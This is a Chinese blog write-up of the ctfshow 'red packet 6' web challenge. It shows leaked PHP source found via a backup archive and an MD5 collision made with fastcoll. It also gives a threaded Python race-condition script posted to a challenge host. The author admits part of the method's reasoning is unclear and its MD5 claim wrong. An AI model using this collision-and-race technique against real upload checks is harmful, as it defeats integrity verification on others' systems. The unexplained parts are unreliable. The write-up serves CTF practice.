ctfshow红包第六弹

最新推荐文章于 2024-07-11 16:57:09 发布
最新推荐文章于 2024-07-11 16:57:09 发布
阅读量1.6k 收藏 1
点赞数 1
文章标签: unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43873408/article/details/119330953
版权

在开始界面点击hint得到提示信息:
在这里插入图片描述
打开连接得到的是一个登录界面,前面提示了不是sql注入,直接放弃尝试,查看网页源码得到信息:

<script>
		function login(s){  
		var u=document.getElementById("username").value;
		var p=document.getElementById("password").value;
        var xhr = new XMLHttpRequest();  
        xhr.open('GET', "login.php?u="+u+"&p="+p);  
        xhr.responseType = 'arraybuffer';  
        xhr.onreadystatechange = function getPdfOnreadystatechange(e) {  
            if (xhr.readyState === 4) {  
              if (xhr.status === 200) {  
                 var data = (xhr.mozResponseArrayBuffer || xhr.mozResponse ||  
                            xhr.responseArrayBuffer || xhr.response);   
				if(data){
					ctfshow(s,data);
				}
              } 
            }  
        };  
        xhr.send(null);  
		}  
		function ctfshow(token,data){

			var oReq = new XMLHttpRequest();
			oReq.open("POST", "check.php?token="+token+"&php://input", true);
			oReq.onload = function (oEvent) {
				if(oReq.status===200){
						var res=eval("("+oReq.response+")");
						if(res.success ==1 &&res.error!=1){
							alert(res.msg);
							return;
						}
						if(res.error ==1){
							alert(res.errormsg);
							return;
						}
				}
				return;
			};
			oReq.send(data);
		}
	</script>

发现登录信息仿佛不是很重要的信息oReq.open("POST", "check.php?token="+token+"&php://input", true);
继续查看没有发现更多的有用信息,下一步尝试使用dirsearch进行扫描:
在这里插入图片描述
web.zip文件很有可能是网站的备份文件,解压后得到check.php.bak文件,查看文件内容:

function receiveStreamFile($receiveFile){
 
    $streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
 
    if(empty($streamData)){
        $streamData = file_get_contents('php://input');
    }
 
    if($streamData!=''){
        $ret = file_put_contents($receiveFile, $streamData, true);
    }else{
        $ret = false;
    }
 
    return $ret;
 
}
if(md5(date("i")) === $token){
	
	$receiveFile = 'flag.dat';
	receiveStreamFile($receiveFile);
	if(md5_file($receiveFile)===md5_file("key.dat")){
		if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
			$ret['success']="1";
			$ret['msg']="人脸识别成功!$flag";
			$ret['error']="0";
			echo json_encode($ret);
			return;
		}

			$ret['errormsg']="same file";
			echo json_encode($ret);
			return;
	}
			$ret['errormsg']="md5 error";
			echo json_encode($ret);
			return;
} 

$ret['errormsg']="token error";
echo json_encode($ret);
return;

发现这里是和key.dat文件进行强碰撞(内容不一样,但是两个文件的md5值相同,同时sha1值不相同)
key.dat文件key直接进行下载
借助工具:fastcoll_v1.0.0.5.exe生成两个md5值相同的文件。fastcoll_v1.0.0.5.exe -p key.dat -o 1.dat 2.dat
接下来直接将1.dat或2.dat直接作为post内容上传即可碰撞成功。

import requests
import time
import hashlib
import threading

def post(data):
	try:
		r=requests.post(url,data=data)
		if "ctfshow" in r.text:
			print(r.text)
	except Exception as e:
		pass

mi=str(time.localtime().tm_min)
m=hashlib.md5(mi.encode()).hexdigest()
url='http://ce61acc9-c947-4ac4-9d2c-3b81b8708df5.challenge.ctf.show:8080/check.php?token={}&php://input'.format(m)
with open('key.dat','rb') as f:
    data1=f.read()
with open('2.dat','rb') as f:
    data2=f.read()
for i in range(30):
	threading.Thread(target=post,args=(data1,)).start()
for i in range(30):
	threading.Thread(target=post,args=(data2,)).start()

直接执行上面的代码就可以成功(以上代码来自于一位大佬,有些地方我也不是很清楚)
完成这道题目后,进行了一下尝试将key.dat文件前面的Hellworld!删除掉也能成功,这就完全不知道为什么了!
/-------------------------------------------------------------------------------------/
太多人都对生成文件进行碰撞这个事情发出疑问了,特地补充一下:
fastcoll用来生成两个MD5值相同但内容不相同的文件

fastcoll_v1.0.0.5.exe -p init.txt -o 1.txt 2.txt

-p 是源文件, -o 是输出文件(两个),同样我们也可以用工具生成四个MD5相同但内容不同的文件
先生成两个MD5相同但内容不同的文件

fastcoll_v1.0.0.5.exe -o 1.txt 2.txt

取其中一个文件作为源文件再生成两个MD5相同但内容不同的文件
在这里插入图片描述
可以看到1.txt 2.txt是128字节,而3.txt 4.txt是256字节,因此我们只需要将3.txt,4.txt文件后128字节取出来放在2.txt后面,便可以有四个MD5相同内容不相同的文件

取出可以用tail

tail.exe -c 128 3.txt > a
tail.exe -c 128 4.txt > b

合成可用win自带的type

type 2.txt a > 5.txt
type 2.txt b > 6.txt

(注:该方法是在网上找到的,当时就是根据这些内容,然后直接尝试上传其中生成的任意一个文件,最后实验成功了,但是很搞的就是事实上MD5值根本不同,所以这个答案出来得就很离谱)

weixin_43873408
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
ctfshow-红包第五
m0_67507776的博客
04-19 787
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow-红包第六
XYH_233的博客
03-13 816
CTFshow红包第六,正解
ctfshow-web红包第六
2202_75812594的博客
04-22 215
3、由于先对文件进行操作,在进行之后的判断,我们可以利用md5中间判断的极小间隙替换原来flag.dat的数据,让sha512成立,造成条件竞争。通过dirmap或者dirsearch进行目录扫描,发现了一个web.zip的文件,下载即能获取check.php的源代码。通过php://input。由于条件竞争的是利用时间间隙来进行绕过,运气不好可能需要运行多次才能看到flag。1、date获取当前时间的分钟数,然后和我们传入的Token进行一个对比。函数里有一条向服务器发送请求的代码。
吾爱2023新年红包第六 (CTF
热门推荐
Codeoooo 博客
06-27 4万+
而且这里面还判断了key的长度,16位,正常key长度也是16位;上面这个 aWfkuqokj454836 15位,心态崩了,看来是假的,这个里面才是真的啊~~~~~~这几道,完全就是整人玩,一个一直点999次,一个大喊大叫还说你是细狗,还得声音分贝大于100才解锁开始找flag;直接将这个 |wfkuqokj4548366 key 扔进去 get_RealKey方法,在比较的时候打断点,或者hook,拿到正确的可以;看伪C代码,memcmp比较, 是有个和真key比较的地方,返回bool;
CTFshow--web--红包第六
weixin_45908624的博客
01-29 884
ctfshow--web--红包第六
[ctf.show.reverse] 红包
weixin_52640415的博客
04-15 1007
下来是个压缩包,解开后一个原码,解码后是notflag,发现压缩包有5k大而解出的java文件只有1k,显然包里还有内容未解出 用010打开包发现有两个EzJar.class文件,手工切出解压 import zlib inflator = zlib.decompressobj(-zlib.MAX_WBITS) f=open('EzJar.jar','rb') f.seek(659) a=f.read(3248) f.close() x = inflator.decompress(a) f=open('
ctf.show_红包第六
m0_74445847的博客
04-20 231
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。2.先上传一模一样的key.dat,通过md5值的比较。这里放了竞争的两种格式。
ctfshow-web-红包第六
HAI_WD的博客
08-26 1165
原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件。进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat。首先跑一下字典,这里用的dirmap,可以看到有一个web.zip。下载下来之后发现是一个网站备份,备份的是check.php.bak。然后接着看,可以看到这里不太可能是sql注入,有一个请求。直接访问进行下载即可。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFshow-web-红包第六
qq_68581192的博客
11-03 154
首先获得key.dat,首先访问一下这个文件,emmm,果然直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,所以我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解。发现web.zip目录是直接下载的,另外两个会跳转页面,但是内容是显示什么什么然后error。发现是跟key.dat比较,我们尝试在url中添加/key.dat,发现可以下载,我们利用下列代码。
红包六(CTFshow)
m0_72827793的博客
01-25 954
我对应着看,结果发现都是0000,奇怪了,这怎么找?可以直接丢进去看,也可以用jd反汇编工具看。这里提示flag不在这里分析一下这段代码。3248怎么来的没搞懂,做个记录吧。就这样用jd反汇编打开这个java。但确实学习了一波压缩包的文件结构。压缩文件有5k解压却变成了1k。为什么是从第659个字节开始?jd逆向工具反编译jar文件。这得对压缩包的文件结构熟悉。jar的逆向,第一次接触。看了别人写的脚本文件。
ctfshow红包第六 wp
最新发布
jwkaaaaaa的博客
07-11 125
ctfshow红包第六 wp
【CTFshow】 红包 ——持续更新中
algae
04-19 1323
红包 红包 葵花宝典 直接注册,登陆,拿到flag
ctfshow web 红包第二
08-16
根据提供的引用内容,这道红包的目标是找到flag。在源代码中,我们可以看到一个GET参数cmd,它可以用来执行命令。然后,在引用中,我们可以看到一个POST请求,其中cmd参数被设置为`. /??p/p?p??????`,这可能是一个命令路径。通过修改POST请求,我们可以尝试找到flag.txt文件。根据引用中的内容,根目录下有flag.txt文件,因此我们可以尝试执行`ls /`命令来列出根目录中的文件。请记住,这是一个漏洞目,仅用于学习和研究目的,不要在未授权的情况下尝试攻击他人的服务器。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshow--web--红包第二](https://blog.csdn.net/weixin_45908624/article/details/128786662)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [CTFSHOW 红包第二](https://blog.csdn.net/qq_46091464/article/details/107954930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值